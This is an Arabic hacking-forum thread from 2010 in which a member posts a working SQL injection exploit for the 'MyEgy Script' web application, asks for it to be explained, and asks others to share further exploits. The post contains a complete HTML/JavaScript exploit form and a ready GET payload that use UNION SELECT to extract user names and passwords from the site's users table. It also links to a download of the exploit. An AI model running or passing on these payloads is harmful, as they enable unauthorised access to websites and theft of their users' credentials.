التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-09-2010, 10:24 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية aassee
 

 

 
إحصائية العضو





aassee غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
aassee is on a distinguished road

................ غير مجاب: ارجو احد يساعدنى فى هذه الثغرة


اسم الثغرة Myegy Script (display.php) Remote SQL Injection Vulnerability وجدتها فى احد المواقع ولكن اريد احد يشرحهالى
واى حد عنده ثغرة لهذا الاسكربت المذكور فى الثغرة ما يبخلش علبا


كود PHP:
<html
<!-- 
Script Name :MyEgy Script 
Authur 
Karar alShaMi Sheko (El3akrab Elmodamer
Email :     K4rar@yahoo.com ahmed_Sheko998@yahoo.com 
Demo 
http://www.7obonlin.com 
Exploit Write the site in (Victimfield then submit the form :) 
AdminCp : /?do=login 
Note 
each color of myegy script have a different columns number so try to change the (Columns numberfield 
to 6 
or or if the exploit failed with 8 :) 
Note 2 We Can Use Get Method To Exploit This Vulnerability 
See line 64 $cat 
$_REQUEST['c']; 
So we Can Exploit it in this way 
http
://localhost/myegy/?c=[Sql] 
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users-- 
//--> 
<head><title>MyEgy Explo!t</title
<
style type="text/css"
.
style1 
 
text-aligncenter

</
style
</
head
<
body
<
script language="Javascript"
function 
doit(si,co){ 
    for(var 
=1;n<co;n++){ 
    if(
tmp){ 
    var 
tmp tmp+n+","
     }else{ 
    var    
tmp n+","
    } 
     } 
tmp =tmp.replace(5,"concat(name,0x3a,password)"); 
********.
f0.action=si+'/'
********.
f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--'
********.
f0.submit

</script> 
<form name="f0" method="post"> 
<p class="style1">My Egy Explo!t</p> 
<p class="style1">By : Karar alShaMi &amp; Sheko</p> 
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="http://localhost/myegy"></p> 
<p class="style1">Columns Number : <input name="cl" type="text" style="width: 27px; height: 22px" value="8"></p> 
<input name="c" type="hidden" value="-1"> 
 <div class="style1"> 
<input name="Submit1" type="submit" value="submit" style="width: 72px" onclick="doit(********.f0.site.value,********.f0.cl.value);"></div> 
</form> 
</body> 
</html 

ودا رابط تحميل ملف التكست عشان لو فيه اكواد ممنوعه فى المنتدى
http://www.mediafire.com/?564xbutz34c81b1
>


Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC hv[, hp] dshu]kn tn i`i hgeyvm

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ضروري حدا يساعدني mano جـــ'ابات العناكــ'ب 3 12-16-2010 06:25 PM
موقع على طبق من ذهب+هدية لمن يساعدني zedoussama Hackers Showoff 8 11-22-2010 02:32 AM
ممكن شرح استغلال الثغرة ذي .. MOST7EL جـــ'ابات العناكــ'ب 0 07-21-2010 11:33 AM
مشكلة في استغلال الثغرة Black DeveL جـــ'ابات العناكــ'ب 4 08-18-2009 10:16 AM


الساعة الآن 05:24 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0